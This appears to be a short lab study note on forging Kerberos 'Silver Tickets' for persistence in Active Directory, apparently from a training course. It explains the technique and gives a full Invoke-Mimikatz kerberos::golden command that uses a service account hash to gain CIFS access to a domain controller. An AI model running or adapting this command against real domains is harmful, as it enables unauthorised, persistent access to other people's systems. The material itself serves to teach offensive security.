Persistence - Silver Ticket
A valid TGS (Golden ticket is TGT).
β’ Encrypted and Signed by the NTLM hash of the service account (Golden ticket is signed by hash of krbtgt) of the service running with that account.
β’ Services rarely check PAC (Privileged Attribute Certificate).
β’ Services will allow access only to the services themselves.
β’ Reasonable persistence period (default 30 days for computer accounts).
Silver Ticket
requirements:
Need to have Domain Admin Acess on DC
#Using hash of the Domain Controller computer account, below
#command provides access to shares on the DC.
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'
#Similar command can be used for any other service on a machine.
Which services? SPN: HOST, RPCSS, WSMAN and many more.Reverse Shell Silver Ticket with HOST



Last updated
Was this helpful?